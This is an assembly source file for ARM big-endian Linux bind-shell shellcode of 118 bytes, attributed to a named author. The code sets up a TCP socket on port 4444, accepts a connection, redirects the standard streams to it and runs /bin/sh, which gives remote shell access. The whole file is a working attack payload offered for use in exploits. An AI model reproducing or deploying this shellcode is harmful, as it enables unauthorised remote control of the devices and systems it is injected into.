/*
Linux Arm Big Endian bind_tcp ipv4 shellcode, 118 bytes
Balazs Bucsay
@xoreipeip | earthquake <at@> rycon <do.t> hu  
http://rycon.hu
port = 4444
ip = 0.0.0.0
*/

.section .text
	.global _start

	_start:
		.code 32

		# Thumb-Mode on
		add 	r6, pc, #1
		bx	r6
		.code 	16

		# _socket(2,1,0)
		sub	r2, r2, r2
		add	r1, r2, #1
		add	r0, r2, #2
		lsl	r7, r1, #8
		add	r7, r7, #0x19
		svc	1
		mov	r6, r0

	/*
	1  uint8_t 	sin_len
	1 sa_family_t 	sin_family
	2 in_port_t 	sin_port
	4 struct in_addr 	sin_addr
	8 char 	sin_zero [8]
	00 02 5C11 00000000 00000000 00000000
	5c11 => 4444
	*/
		# _bind()
		mov	r2, #2
		lsl	r2, r2, #8
		add	r2, r2, #0x11
		lsl	r2, r2, #8
		add	r2, r2, #0x5C
		sub	r3, r3, r3
		sub	r4, r4, r4
		sub 	r5, r5, r5
		mov	r1, sp
		stm	r1!, {r2-r5}
		sub	r1, #0x10
		mov	r2, #16
		add	r7, r7, #1
		svc	1

		# _listen()
		mov	r0, r6
		sub	r1, r1, r1
		add	r7, r7, #2
		svc	1
		
		# _accept()
		mov	r0, r6
		sub	r2, r2, r2
		add	r7, r7, #1
		svc	1
		mov	r6, r0

		# _dup2()
		sub	r1, r1, r1
		mov	r7, #63
		svc	1
	
		mov	r0, r6
		add	r1, r1, #1
		svc	1

		mov	r0, r6
		add	r1, r1, #1
		svc	1

		# _execve()
		sub	r2, r2, r2
		mov 	r0, pc
		add 	r0, #18
// next intstruction terminates the string beneath the code "//bin/sh"
// in case you want to say goodbye to the null character
//		str	r2, [r0, #8]
		str	r2, [sp, #8]
		str	r0, [sp, #4]
		add 	r1, sp, #4
		mov 	r7, #11
		svc 	1

		# _exit()
		sub	r4, r4, r4
		mov	r0, r4
		mov 	r7, #1
		svc	1
.ascii "//bin/sh\0"
//.ascii "//bin/sh"